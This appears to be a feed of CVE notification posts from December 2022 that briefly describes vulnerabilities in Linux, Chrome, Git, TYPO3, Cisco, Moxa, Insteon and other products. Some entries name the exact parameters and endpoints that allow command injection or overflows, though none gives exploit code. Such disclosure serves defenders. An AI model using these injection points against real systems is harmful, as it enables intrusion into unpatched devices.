| 2022-12-14 20:29:46 |
🚨 CVE-2022-1353A vulnerability was found in the pfkey_register function in net/key/af_key.c in the Linux kernel. This flaw allows a local, unprivileged user to gain access to kernel memory, leading to a system crash or a leak of internal kernel information.🎖@cveNotify |
|
| 2022-12-14 20:29:45 |
🚨 CVE-2016-4160Adobe Flash Player before 18.0.0.352 and 19.x through 21.x before 21.0.0.242 on Windows and OS X and before 11.2.202.621 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-1096, CVE-2016-1098, CVE-2016-1099, CVE-2016-1100, CVE-2016-1102, CVE-2016-1104, CVE-2016-4109, CVE-2016-4111, CVE-2016-4112, CVE-2016-4113, CVE-2016-4114, CVE-2016-4115, CVE-2016-4120, CVE-2016-4161, CVE-2016-4162, and CVE-2016-4163.🎖@cveNotify |
|
| 2022-12-14 18:30:37 |
🚨 CVE-2017-14463An exploitable access control vulnerability exists in the data, program, and function file permissions functionality of Allen Bradley Micrologix 1400 Series B FRN 21.2 and before. A specially crafted packet can cause a read or write operation resulting in disclosure of sensitive information, modification of settings, or modification of ladder logic. An attacker can send unauthenticated packets to trigger this vulnerability. Required Keyswitch State: REMOTE or PROG Associated Fault Code: 0012 Fault Type: Non-User Description: A fault state can be triggered by overwriting the ladder logic data file (type 0x22 number 0x02) with null values.🎖@cveNotify |
|
| 2022-12-14 18:30:36 |
🚨 CVE-2017-14462An exploitable access control vulnerability exists in the data, program, and function file permissions functionality of Allen Bradley Micrologix 1400 Series B FRN 21.2 and before. A specially crafted packet can cause a read or write operation resulting in disclosure of sensitive information, modification of settings, or modification of ladder logic. An attacker can send unauthenticated packets to trigger this vulnerability. Required Keyswitch State: REMOTE or PROG (also RUN for some) Description: Allows an attacker to enable SNMP, Modbus, DNP, and any other features in the channel configuration. Also allows attackers to change network parameters, such as IP address, name server, and domain name.🎖@cveNotify |
|
| 2022-12-14 18:30:35 |
🚨 CVE-2017-14446An exploitable stack-based buffer overflow vulnerability exists in Insteon Hub running firmware version 1012. The HTTP server implementation unsafely extracts parameters from the query string, leading to a buffer overflow on the stack. An attacker can send an HTTP GET request to trigger this vulnerability.🎖@cveNotify |
|
| 2022-12-14 18:30:31 |
🚨 CVE-2017-14445An exploitable buffer overflow vulnerability exists in Insteon Hub running firmware version 1012. The HTTP server implementation incorrectly handles the host parameter during a firmware update request, leading to a buffer overflow on a global section. An attacker can send an HTTP GET request to trigger this vulnerability.🎖@cveNotify |
|
| 2022-12-14 18:30:30 |
🚨 CVE-2022-20688A vulnerability in the Cisco Discovery Protocol functionality of Cisco ATA 190 Series Analog Telephone Adapter firmware could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device and cause Cisco Discovery Protocol service to restart. This vulnerability is due to missing length validation of certain Cisco Discovery Protocol packet header fields. An attacker could exploit these vulnerabilities by sending a malicious Cisco Discovery Protocol packet to an affected device. A successful exploit could allow the attacker to execute code on the affected device and cause Cisco Discovery Protocol to restart unexpectedly, resulting in a DoS condition.🎖@cveNotify |
|
| 2022-12-14 18:30:29 |
🚨 CVE-2017-14444An exploitable buffer overflow vulnerability exists in Insteon Hub running firmware version 1012. The HTTP server implementation incorrectly handles the URL parameter during a firmware update request, leading to a buffer overflow on a global section. An attacker can send an HTTP GET request to trigger this vulnerability.🎖@cveNotify |
|
| 2022-12-14 18:30:25 |
🚨 CVE-2017-12130An exploitable NULL pointer dereference vulnerability exists in the tinysvcmdns library version 2017-11-05. A specially crafted packet can make the library dereference a NULL pointer leading to a server crash and denial of service. An attacker needs to send a DNS query to trigger this vulnerability.🎖@cveNotify |
|
| 2022-12-14 18:30:24 |
🚨 CVE-2017-12122An exploitable code execution vulnerability exists in the ILBM image rendering functionality of SDL2_image-2.0.2. A specially crafted ILBM image can cause a heap overflow resulting in code execution. An attacker can display a specially crafted image to trigger this vulnerability.🎖@cveNotify |
|
| 2022-12-14 18:30:23 |
🚨 CVE-2017-12120An exploitable command injection vulnerability exists in the web server functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted HTTP POST can cause a privilege escalation, resulting in a root shell. An attacker can inject OS commands into the ip= parm in the "/goform/net_WebPingGetValue" URI to trigger this vulnerability.🎖@cveNotify |
|
| 2022-12-14 18:30:19 |
🚨 CVE-2022-20968A vulnerability in the Cisco Discovery Protocol processing feature of Cisco IP Phone 7800 and 8800 Series firmware could allow an unauthenticated, adjacent attacker to cause a stack overflow on an affected device. This vulnerability is due to insufficient input validation of received Cisco Discovery Protocol packets. An attacker could exploit this vulnerability by sending crafted Cisco Discovery Protocol traffic to an affected device. A successful exploit could allow the attacker to cause a stack overflow, resulting in possible remote code execution or a denial of service (DoS) condition on an affected device.🎖@cveNotify |
|
| 2022-12-14 18:30:18 |
🚨 CVE-2022-31358A reflected cross-site scripting (XSS) vulnerability in Proxmox Virtual Environment prior to v7.2-3 allows remote attackers to execute arbitrary web scripts or HTML via non-existent endpoints under path /api2/html/.🎖@cveNotify |
|
| 2022-12-14 18:30:17 |
🚨 CVE-2022-44832D-Link DIR-3040 device with firmware 120B03 was discovered to contain a command injection vulnerability via the SetTriggerLEDBlink function.🎖@cveNotify |
|
| 2022-12-14 18:30:16 |
🚨 CVE-2022-44898The MsIo64.sys component in Asus Aura Sync through v1.07.79 does not properly validate input to IOCTL 0x80102040, 0x80102044, 0x80102050, and 0x80102054, allowing attackers to trigger a memory corruption and cause a Denial of Service (DoS) or escalate privileges via crafted IOCTL requests.🎖@cveNotify |
|
| 2022-12-14 16:29:36 |
🚨 CVE-2019-18413In TypeStack class-validator 0.10.2, validate() input validation can be bypassed because certain internal attributes can be overwritten via a conflicting name. Even though there is an optional forbidUnknownValues parameter that can be used to reduce the risk of this bypass, this option is not documented and thus most developers configure input validation in the vulnerable default manner. With this vulnerability, attackers can launch SQL Injection or XSS attacks by injecting arbitrary malicious input. NOTE: a software maintainer agrees with the "is not documented" finding but suggests that much of the responsibility for the risk lies in a different product.🎖@cveNotify |
|
| 2022-12-14 16:29:35 |
🚨 CVE-2016-9040An exploitable denial of service exists in the the Joyent SmartOS OS 20161110T013148Z Hyprlofs file system. The vulnerability is present in the Ioctl system call with the command HYPRLOFSADDENTRIES when used with a 32 bit model. An attacker can cause a buffer to be allocated and never freed. When repeatedly exploit this will result in memory exhaustion, resulting in a full system denial of service.🎖@cveNotify |
|
| 2022-12-14 14:29:41 |
🚨 CVE-2022-4493A vulnerability classified as critical was found in scifio. Affected by this vulnerability is the function downloadAndUnpackResource of the file src/test/java/io/scif/util/DefaultSampleFilesService.java of the component ZIP File Handler. The manipulation leads to path traversal. The attack can be launched remotely. The name of the patch is fcb0dbca0ec72b22fe0c9ddc8abc9cb188a0ff31. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-215803.🎖@cveNotify |
|
| 2022-12-14 14:29:40 |
🚨 CVE-2022-4494A vulnerability, which was classified as critical, has been found in bspkrs MCPMappingViewer. Affected by this issue is the function extractZip of the file src/main/java/bspkrs/mmv/RemoteZipHandler.java of the component ZIP File Handler. The manipulation leads to path traversal. The attack may be launched remotely. The name of the patch is 6e602746c96b4756c271d080dae7d22ad804a1bd. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-215804.🎖@cveNotify |
|
| 2022-12-14 12:29:55 |
🚨 CVE-2022-34271A vulnerability in import module of Apache Atlas allows an authenticated user to write to web server filesystem. This issue affects Apache Atlas versions from 0.8.4 to 2.2.0.🎖@cveNotify |
|
| 2022-12-14 12:29:54 |
🚨 CVE-2022-3073Quanos "SCHEMA ST4" example web templates in version Bootstrap 2019 v2/2021 v1/2022 v1/2022 SP1 v1 or below are prone to JavaScript injection allowing a remote attacker to hijack existing sessions to e.g. other web services in the same environment or execute scripts in the users browser environment. The affected script is '*-schema.js'.🎖@cveNotify |
|
| 2022-12-14 12:29:52 |
🚨 CVE-2022-3590WordPress is affected by an unauthenticated blind SSRF in the pingback feature. Because of a TOCTOU race condition between the validation checks and the HTTP request, attackers can reach internal hosts that are explicitly forbidden.🎖@cveNotify |
|
| 2022-12-14 12:29:51 |
🚨 CVE-2022-23500TYPO3 is an open source PHP based web content management system. In versions prior to 9.5.38, 10.4.33, 11.5.20, and 12.1.1, requesting invalid or non-existing resources via HTTP triggers the page error handler, which again could retrieve content to be shown as an error message from another page. This leads to a scenario in which the application is calling itself recursively - amplifying the impact of the initial attack until the limits of the web server are exceeded. This vulnerability is very similar, but not identical, to the one described in CVE-2021-21359. This issue is patched in versions 9.5.38 ELTS, 10.4.33, 11.5.20 or 12.1.1.🎖@cveNotify |
|
| 2022-12-14 12:29:50 |
🚨 CVE-2022-23501TYPO3 is an open source PHP based web content management system. In versions prior to 8.7.49, 9.5.38, 10.4.33, 11.5.20, and 12.1.1 TYPO3 is vulnerable to Improper Authentication. Restricting frontend login to specific users, organized in different storage folders (partitions), can be bypassed. A potential attacker might use this ambiguity in usernames to get access to a different account - however, credentials must be known to the adversary. This issue is patched in versions 8.7.49 ELTS, 9.5.38 ELTS, 10.4.33, 11.5.20, 12.1.1.🎖@cveNotify |
|
| 2022-12-14 12:29:48 |
🚨 CVE-2022-23502TYPO3 is an open source PHP based web content management system. In versions prior to 10.4.33, 11.5.20, and 12.1.1, When users reset their password using the corresponding password recovery functionality, existing sessions for that particular user account were not revoked. This applied to both frontend user sessions and backend user sessions. This issue is patched in versions 10.4.33, 11.5.20, 12.1.1.🎖@cveNotify |
|
| 2022-12-14 12:29:47 |
🚨 CVE-2022-23503TYPO3 is an open source PHP based web content management system. Versions prior to 8.7.49, 9.5.38, 10.4.33, 11.5.20, and 12.1.1 are vulnerable to Code Injection. Due to the lack of separating user-submitted data from the internal configuration in the Form Designer backend module, it is possible to inject code instructions to be processed and executed via TypoScript as PHP code. The existence of individual TypoScript instructions for a particular form item and a valid backend user account with access to the form module are needed to exploit this vulnerability. This issue is patched in versions 8.7.49 ELTS, 9.5.38 ELTS, 10.4.33, 11.5.20, 12.1.1.🎖@cveNotify |
|
| 2022-12-14 12:29:46 |
🚨 CVE-2022-23504TYPO3 is an open source PHP based web content management system. Versions prior to 9.5.38, 10.4.33, 11.5.20, and 12.1.1 are subject to Sensitive Information Disclosure. Due to the lack of handling user-submitted YAML placeholder expressions in the site configuration backend module, attackers could expose sensitive internal information, such as system configuration or HTTP request messages of other website visitors. A valid backend user account having administrator privileges is needed to exploit this vulnerability. This issue has been patched in versions 9.5.38 ELTS, 10.4.33, 11.5.20, 12.1.1.🎖@cveNotify |
|
| 2022-12-14 12:29:45 |
🚨 CVE-2022-4436Use after free in Blink Media in Google Chrome prior to 108.0.5359.124 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2022-12-14 12:29:44 |
🚨 CVE-2022-4437Use after free in Mojo IPC in Google Chrome prior to 108.0.5359.124 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2022-12-14 12:29:42 |
🚨 CVE-2022-4438Use after free in Blink Frames in Google Chrome prior to 108.0.5359.124 allowed a remote attacker who convinced the user to engage in specific UI interactions to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2022-12-14 12:29:41 |
🚨 CVE-2022-4439Use after free in Aura in Google Chrome on Windows prior to 108.0.5359.124 allowed a remote attacker who convinced the user to engage in specific UI interactions to potentially exploit heap corruption via specific UI interactions. (Chromium security severity: High)🎖@cveNotify |
|
| 2022-12-14 12:29:40 |
🚨 CVE-2022-4440Use after free in Profiles in Google Chrome prior to 108.0.5359.124 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2022-12-14 07:29:53 |
🚨 CVE-2022-24377The package cycle-import-check before 1.3.2 are vulnerable to Command Injection via the writeFileToTmpDirAndOpenIt function due to improper user-input sanitization.🎖@cveNotify |
|
| 2022-12-14 07:29:52 |
🚨 CVE-2022-4144An out-of-bounds read flaw was found in the QXL display device emulation in QEMU. The qxl_phys2virt() function does not check the size of the structure pointed to by the guest physical address, potentially reading past the end of the bar space into adjacent pages. A malicious guest user could use this flaw to crash the QEMU process on the host causing a denial of service condition.🎖@cveNotify |
|
| 2022-12-14 07:29:48 |
🚨 CVE-2022-4172An integer overflow and buffer overflow issues were found in the ACPI Error Record Serialization Table (ERST) device of QEMU in the read_erst_record() and write_erst_record() functions. Both issues may allow the guest to overrun the host buffer allocated for the ERST memory device. A malicious guest could use these flaws to crash the QEMU process on the host.🎖@cveNotify |
|
| 2022-12-14 07:29:47 |
🚨 CVE-2021-3638An out-of-bounds memory access flaw was found in the ATI VGA device emulation of QEMU. This flaw occurs in the ati_2d_blt() routine while handling MMIO write operations when the guest provides invalid values for the destination display parameters. A malicious guest could use this flaw to crash the QEMU process on the host, resulting in a denial of service.🎖@cveNotify |
|
| 2022-12-14 07:29:46 |
🚨 CVE-2020-9420The login password of the web administrative dashboard in Arcadyan Wifi routers VRV9506JAC23 is sent in cleartext, allowing an attacker to sniff and intercept traffic to learn the administrative credentials to the router.🎖@cveNotify |
|
| 2022-12-14 07:29:42 |
🚨 CVE-2022-42716An issue was discovered in the Arm Mali GPU Kernel Driver. There is a use-after-free. A non-privileged user can make improper GPU processing operations to gain access to already freed memory. This affects Valhall r29p0 through r40P0.🎖@cveNotify |
|
| 2022-12-14 07:29:41 |
🚨 CVE-2022-39253Git is an open source, scalable, distributed revision control system. Versions prior to 2.30.6, 2.31.5, 2.32.4, 2.33.5, 2.34.5, 2.35.5, 2.36.3, and 2.37.4 are subject to exposure of sensitive information to a malicious actor. When performing a local clone (where the source and target of the clone are on the same volume), Git copies the contents of the source's `$GIT_DIR/objects` directory into the destination by either creating hardlinks to the source contents, or copying them (if hardlinks are disabled via `--no-hardlinks`). A malicious actor could convince a victim to clone a repository with a symbolic link pointing at sensitive information on the victim's machine. This can be done either by having the victim clone a malicious repository on the same machine, or having them clone a malicious repository embedded as a bare repository via a submodule from any source, provided they clone with the `--recurse-submodules` option. Git does not create symbolic links in the `$GIT_DIR/objects` directory. The problem has been patched in the versions published on 2022-10-18, and backported to v2.30.x. Potential workarounds: Avoid cloning untrusted repositories using the `--local` optimization when on a shared machine, either by passing the `--no-local` option to `git clone` or cloning from a URL that uses the `file://` scheme. Alternatively, avoid cloning repositories from untrusted sources with `--recurse-submodules` or run `git config --global protocol.file.allow user`.🎖@cveNotify |
|
| 2022-12-14 07:29:40 |
🚨 CVE-2022-29187Git is a distributed revision control system. Git prior to versions 2.37.1, 2.36.2, 2.35.4, 2.34.4, 2.33.4, 2.32.3, 2.31.4, and 2.30.5, is vulnerable to privilege escalation in all platforms. An unsuspecting user could still be affected by the issue reported in CVE-2022-24765, for example when navigating as root into a shared tmp directory that is owned by them, but where an attacker could create a git repository. Versions 2.37.1, 2.36.2, 2.35.4, 2.34.4, 2.33.4, 2.32.3, 2.31.4, and 2.30.5 contain a patch for this issue. The simplest way to avoid being affected by the exploit described in the example is to avoid running git as root (or an Administrator in Windows), and if needed to reduce its use to a minimum. While a generic workaround is not possible, a system could be hardened from the exploit described in the example by removing any such repository if it exists already and creating one as root to block any future attacks.🎖@cveNotify |
|
| 2022-12-14 07:29:39 |
🚨 CVE-2022-24765Git for Windows is a fork of Git containing Windows-specific patches. This vulnerability affects users working on multi-user machines, where untrusted parties have write access to the same hard disk. Those untrusted parties could create the folder `C:\.git`, which would be picked up by Git operations run supposedly outside a repository while searching for a Git directory. Git would then respect any config in said Git directory. Git Bash users who set `GIT_PS1_SHOWDIRTYSTATE` are vulnerable as well. Users who installed posh-gitare vulnerable simply by starting a PowerShell. Users of IDEs such as Visual Studio are vulnerable: simply creating a new project would already read and respect the config specified in `C:\.git\config`. Users of the Microsoft fork of Git are vulnerable simply by starting a Git Bash. The problem has been patched in Git for Windows v2.35.2. Users unable to upgrade may create the folder `.git` on all drives where Git commands are run, and remove read/write access from those folders as a workaround. Alternatively, define or extend `GIT_CEILING_DIRECTORIES` to cover the _parent_ directory of the user profile, e.g. `C:\Users` if the user profile is located in `C:\Users\my-user-name`.🎖@cveNotify |
|
| 2022-12-14 01:30:01 |
🚨 CVE-2022-37155RCE in SPIP 3.1.13 through 4.1.2 allows remote authenticated users to execute arbitrary code via a GET parameter🎖@cveNotify |
|
| 2022-12-14 01:30:00 |
🚨 CVE-2022-42139Delta Electronics DVW-W02W2-E2 1.5.0.10 is vulnerable to Command Injection via Crafted URL.🎖@cveNotify |
|
| 2022-12-14 01:29:56 |
🚨 CVE-2022-42140Delta Electronics DX-2100-L1-CN 2.42 is vulnerable to Command Injection via lform/net_diagnose.🎖@cveNotify |
|
| 2022-12-14 01:29:55 |
🚨 CVE-2022-42141Delta Electronics DX-2100-L1-CN 2.42 is vulnerable to Cross Site Scripting (XSS) via lform/urlfilter.🎖@cveNotify |
|
| 2022-12-14 01:29:54 |
🚨 CVE-2022-45957ZTE ZXHN-H108NS router with firmware version H108NSV1.0.7u_ZRD_GR2_A68 is vulnerable to remote stack buffer overflow.🎖@cveNotify |
|
| 2022-12-14 01:29:53 |
🚨 CVE-2022-43333Telenia Software s.r.l TVox before v22.0.17 was discovered to contain a remote code execution (RCE) vulnerability in the component action_export_control.php.🎖@cveNotify |
|
| 2022-12-14 01:29:52 |
🚨 CVE-2022-44874wasm3 commit 7890a2097569fde845881e0b352d813573e371f9 was discovered to contain a segmentation fault via the component op_CallIndirect at /m3_exec.h.🎖@cveNotify |
|
| 2022-12-14 01:29:48 |
🚨 CVE-2022-37972Microsoft Endpoint Configuration Manager Spoofing Vulnerability.🎖@cveNotify |
|
| 2022-12-14 01:29:47 |
🚨 CVE-2022-35295In SAP Host Agent (SAPOSCOL) - version 7.22, an attacker may use files created by saposcol to escalate privileges for themselves.🎖@cveNotify |
|
| 2022-12-14 01:29:46 |
🚨 CVE-2022-34704Windows Defender Credential Guard Information Disclosure Vulnerability. This CVE ID is unique from CVE-2022-34710, CVE-2022-34712.🎖@cveNotify |
|
| 2022-12-14 00:29:56 |
🚨 CVE-2022-44650A memory corruption vulnerability in the Unauthorized Change Prevention service of Trend Micro Apex One and Apex One as a Service could allow a local attacker to elevate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.🎖@cveNotify |
|
| 2022-12-14 00:29:55 |
🚨 CVE-2016-8713A remote out of bound write / memory corruption vulnerability exists in the PDF parsing functionality of Nitro Pro 10.5.9.9. A specially crafted PDF file can cause a vulnerability resulting in potential memory corruption. An attacker can send the victim a specific PDF file to trigger this vulnerability.🎖@cveNotify |
|
| 2022-12-14 00:29:54 |
🚨 CVE-2016-8712An exploitable nonce reuse vulnerability exists in the Web Application functionality of Moxa AWK-3131A Wireless AP running firmware 1.1. The device uses one nonce for all session authentication requests and only changes the nonce if the web application has been idle for 300 seconds.🎖@cveNotify |
|
| 2022-12-14 00:29:53 |
🚨 CVE-2016-8711A potential remote code execution vulnerability exists in the PDF parsing functionality of Nitro Pro 10. A specially crafted PDF file can cause a vulnerability resulting in potential code execution. An attacker can send the victim a specific PDF file to trigger this vulnerability.🎖@cveNotify |
|
| 2022-12-14 00:29:50 |
🚨 CVE-2016-8710An exploitable heap write out of bounds vulnerability exists in the decoding of BPG images in Libbpg library. A crafted BPG image decoded by libbpg can cause an integer underflow vulnerability causing an out of bounds heap write leading to remote code execution. This vulnerability can be triggered via attempting to decode a crafted BPG image using Libbpg.🎖@cveNotify |
|
| 2022-12-14 00:29:49 |
🚨 CVE-2016-8707An exploitable out of bounds write exists in the handling of compressed TIFF images in ImageMagicks's convert utility. A crafted TIFF document can lead to an out of bounds write which in particular circumstances could be leveraged into remote code execution. The vulnerability can be triggered through any user controlled TIFF that is handled by this functionality.🎖@cveNotify |
|
| 2022-12-14 00:29:48 |
🚨 CVE-2016-8390An exploitable out of bounds write vulnerability exists in the parsing of ELF Section Headers of Hopper Disassembler 3.11.20. A specially crafted ELF file can cause attacker controlled pointer arithmetic resulting in a partially controlled out of bounds write. An attacker can craft an ELF file with specific section headers to trigger this vulnerability.🎖@cveNotify |
|
| 2022-12-14 00:29:44 |
🚨 CVE-2016-8389An exploitable integer-overflow vulnerability exists within Iceni Argus. When it attempts to convert a malformed PDF to XML, it will attempt to convert each character from a font into a polygon and then attempt to rasterize these shapes. As the application attempts to iterate through the rows and initializing the polygon shape in the buffer, it will write outside of the bounds of said buffer. This can lead to code execution under the context of the account running it.🎖@cveNotify |
|
| 2022-12-14 00:29:43 |
🚨 CVE-2010-4604Stack-based buffer overflow in the GeneratePassword function in dsmtca (aka the Trusted Communications Agent or TCA) in the backup-archive client in IBM Tivoli Storage Manager (TSM) 5.3.x before 5.3.6.10, 5.4.x before 5.4.3.4, 5.5.x before 5.5.2.10, and 6.1.x before 6.1.3.1 on Unix and Linux allows local users to gain privileges by specifying a long LANG environment variable, and then sending a request over a pipe.🎖@cveNotify |
|
| 2022-12-14 00:29:42 |
🚨 CVE-2016-8386An exploitable heap-based buffer overflow exists in Iceni Argus. When it attempts to convert a PDF containing a malformed font to XML, the tool will attempt to use a size out of the font to search through a linked list of buffers to return. Due to a signedness issue, a buffer smaller than the requested size will be returned. Later when the tool tries to populate this buffer, the overflow will occur which can lead to code execution under the context of the user running the tool.🎖@cveNotify |
|
| 2022-12-14 00:29:41 |
🚨 CVE-2022-37910A buffer overflow vulnerability exists in the ArubaOS command line interface. Successful exploitation of this vulnerability results in a denial of service on the affected system.🎖@cveNotify |
|
| 2022-12-14 00:29:38 |
🚨 CVE-2016-8387An exploitable heap-based buffer overflow exists in Iceni Argus. When it attempts to convert a malformed PDF with an object encoded w/ multiple encoding types terminating with an LZW encoded type, an overflow may occur due to a lack of bounds checking by the LZW decoder. This can lead to code execution under the context of the account of the user running it.🎖@cveNotify |
|
| 2022-12-14 00:29:37 |
🚨 CVE-2016-8385An exploitable uninitialized variable vulnerability which leads to a stack-based buffer overflow exists in Iceni Argus. When it attempts to convert a malformed PDF to XML a stack variable will be left uninitialized which will later be used to fetch a length that is used in a copy operation. In most cases this will allow an aggressor to write outside the bounds of a stack buffer which is used to contain colors. This can lead to code execution under the context of the account running the tool.🎖@cveNotify |
|
| 2022-12-14 00:29:36 |
🚨 CVE-2022-2947Altair HyperView Player versions 2021.1.0.27 and prior perform operations on a memory buffer but can read from or write to a memory location outside of the intended boundary of the buffer. This hits initially as a read access violation, leading to a memory corruption situation.🎖@cveNotify |
|
| 2022-12-14 00:29:35 |
🚨 CVE-2022-2949Altair HyperView Player versions 2021.1.0.27 and prior are vulnerable to the use of uninitialized memory vulnerability during parsing of H3D files. A DWORD is extracted from an uninitialized buffer and, after sign extension, is used as an index into a stack variable to increment a counter leading to memory corruption.🎖@cveNotify |
|
| 2022-12-13 22:30:04 |
🚨 CVE-2022-37885There are buffer overflow vulnerabilities in multiple underlying services that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba Networks AP management protocol) UDP port (8211). Successful exploitation of these vulnerabilities results in the ability to execute arbitrary code as a privileged user on the underlying operating system of Aruba InstantOS 6.4.x: 6.4.4.8-4.2.4.20 and below; Aruba InstantOS 6.5.x: 6.5.4.23 and below; Aruba InstantOS 8.6.x: 8.6.0.18 and below; Aruba InstantOS 8.7.x: 8.7.1.9 and below; Aruba InstantOS 8.10.x: 8.10.0.1 and below; ArubaOS 10.3.x: 10.3.1.0 and below; Aruba has released upgrades for Aruba InnstantOS that address these security vulnerabilities.🎖@cveNotify |
|
| 2022-12-13 22:30:00 |
🚨 CVE-2022-22488IBM OpenBMC OP910 and OP940 could allow a privileged user to cause a denial of service by uploading or deleting too many CA certificates in a short period of time. IBM X-Force ID: 2226337.🎖@cveNotify |
|
| 2022-12-13 22:29:59 |
🚨 CVE-2021-3732A flaw was found in the Linux kernel's OverlayFS subsystem in the way the user mounts the TmpFS filesystem with OverlayFS. This flaw allows a local user to gain access to hidden files that should not be accessible.🎖@cveNotify |
|
| 2022-12-13 22:29:58 |
🚨 CVE-2019-1649A vulnerability in the logic that handles access control to one of the hardware components in Cisco's proprietary Secure Boot implementation could allow an authenticated, local attacker to write a modified firmware image to the component. This vulnerability affects multiple Cisco products that support hardware-based Secure Boot functionality. The vulnerability is due to an improper check on the area of code that manages on-premise updates to a Field Programmable Gate Array (FPGA) part of the Secure Boot hardware implementation. An attacker with elevated privileges and access to the underlying operating system that is running on the affected device could exploit this vulnerability by writing a modified firmware image to the FPGA. A successful exploit could either cause the device to become unusable (and require a hardware replacement) or allow tampering with the Secure Boot verification process, which under some circumstances may allow the attacker to install and boot a malicious software image. An attacker will need to fulfill all the following conditions to attempt to exploit this vulnerability: Have privileged administrative access to the device. Be able to access the underlying operating system running on the device; this can be achieved either by using a supported, documented mechanism or by exploiting another vulnerability that would provide an attacker with such access. Develop or have access to a platform-specific exploit. An attacker attempting to exploit this vulnerability across multiple affected platforms would need to research each one of those platforms and then develop a platform-specific exploit. Although the research process could be reused across different platforms, an exploit developed for a given hardware platform is unlikely to work on a different hardware platform.🎖@cveNotify |
|
| 2022-12-13 19:29:57 |
🚨 CVE-2016-8719An exploitable reflected Cross-Site Scripting vulnerability exists in the Web Application functionality of Moxa AWK-3131A Wireless Access Point running firmware 1.1. Specially crafted input, in multiple parameters, can cause a malicious scripts to be executed by a victim.🎖@cveNotify |
|
| 2022-12-13 19:29:56 |
🚨 CVE-2019-25078A vulnerability classified as problematic was found in pacparser up to 1.3.x. Affected by this vulnerability is the function pacparser_find_proxy of the file src/pacparser.c. The manipulation of the argument url leads to buffer overflow. Attacking locally is a requirement. Upgrading to version 1.4.0 is able to address this issue. The name of the patch is 853e8f45607cb07b877ffd270c63dbcdd5201ad9. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-215443.🎖@cveNotify |
|
| 2022-12-13 19:29:55 |
🚨 CVE-2022-45028A cross-site scripting (XSS) vulnerability in Arris NVG443B 9.3.0h3d36 allows attackers to execute arbitrary web scripts or HTML via a crafted POST request sent to /cgi-bin/logs.ha.🎖@cveNotify |
|
| 2022-12-13 19:29:54 |
🚨 CVE-2022-4455A vulnerability, which was classified as problematic, was found in sproctor php-calendar. This affects an unknown part of the file index.php. The manipulation of the argument $_SERVER['PHP_SELF'] leads to cross site scripting. It is possible to initiate the attack remotely. The name of the patch is a2941109b42201c19733127ced763e270a357809. It is recommended to apply a patch to fix this issue. The identifier VDB-215445 was assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-13 19:29:50 |
🚨 CVE-2022-4456A vulnerability has been found in falling-fruit and classified as problematic. This vulnerability affects unknown code. The manipulation leads to cross site scripting. The attack can be initiated remotely. The name of the patch is 15adb8e1ea1f1c3e3d152fc266071f621ef0c621. It is recommended to apply a patch to fix this issue. VDB-215446 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-13 19:29:49 |
🚨 CVE-2022-31596Under certain conditions, an attacker authenticated as a CMS administrator and with high privileges access to the Network in SAP BusinessObjects Business Intelligence Platform (Monitoring DB) - version 430, can access BOE Monitoring database to retrieve and modify (non-personal) system data which would otherwise be restricted. Also, a potential attack could be used to leave the CMS's scope and impact the database. A successful attack could have a low impact on confidentiality, a high impact on integrity, and a low impact on availability.🎖@cveNotify |
|
| 2022-12-13 19:29:48 |
🚨 CVE-2016-8720An exploitable HTTP Header Injection vulnerability exists in the Web Application functionality of the Moxa AWK-3131A Wireless Access Point running firmware 1.1. A specially crafted HTTP request can inject a payload in the bkpath parameter which will be copied in to Location header of the HTTP response.🎖@cveNotify |
|
| 2022-12-13 19:29:44 |
🚨 CVE-2016-8721An exploitable OS Command Injection vulnerability exists in the web application 'ping' functionality of Moxa AWK-3131A Wireless Access Points running firmware 1.1. Specially crafted web form input can cause an OS Command Injection resulting in complete compromise of the vulnerable device. An attacker can exploit this vulnerability remotely.🎖@cveNotify |
|
| 2022-12-13 19:29:43 |
🚨 CVE-2022-4416A vulnerability was found in RainyGao DocSys. It has been declared as critical. This vulnerability affects the function getReposAllUsers of the file /DocSystem/Repos/getReposAllUsers.do. The manipulation of the argument searchWord/reposId leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-215278 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-13 19:29:42 |
🚨 CVE-2016-8729An exploitable memory corruption vulnerability exists in the JBIG2 parser of Artifex MuPDF 1.9. A specially crafted PDF can cause a negative number to be passed to a memset resulting in memory corruption and potential code execution. An attacker can specially craft a PDF and send to the victim to trigger this vulnerability.🎖@cveNotify |
|
| 2022-12-13 19:29:41 |
🚨 CVE-2016-8728An exploitable heap out of bounds write vulnerability exists in the Fitz graphical library part of the MuPDF renderer. A specially crafted PDF file can cause a out of bounds write resulting in heap metadata and sensitive process memory corruption leading to potential code execution. Victim needs to open the specially crafted file in a vulnerable reader in order to trigger this vulnerability.🎖@cveNotify |
|
| 2022-12-13 19:29:38 |
🚨 CVE-2016-8726An exploitable null pointer dereference vulnerability exists in the Web Application /forms/web_runScript iw_filename functionality of Moxa AWK-3131A Wireless Access Point running firmware 1.1. An HTTP POST request with a blank line in the header will cause a segmentation fault in the web server.🎖@cveNotify |
|
| 2022-12-13 19:29:37 |
🚨 CVE-2019-3638Reflected Cross Site Scripting vulnerability in Administrators web console in McAfee Web Gateway (MWG) 7.8.x prior to 7.8.2.13 allows remote attackers to collect sensitive information or execute commands with the MWG administrator's credentials via tricking the administrator to click on a carefully constructed malicious link.🎖@cveNotify |
|
| 2022-12-13 19:29:36 |
🚨 CVE-2019-3635Exfiltration of Data in McAfee Web Gateway (MWG) 7.8.2.x prior to 7.8.2.12 allows attackers to obtain sensitive data via crafting a complex webpage that will trigger the Web Gateway to block the user accessing an iframe.🎖@cveNotify |
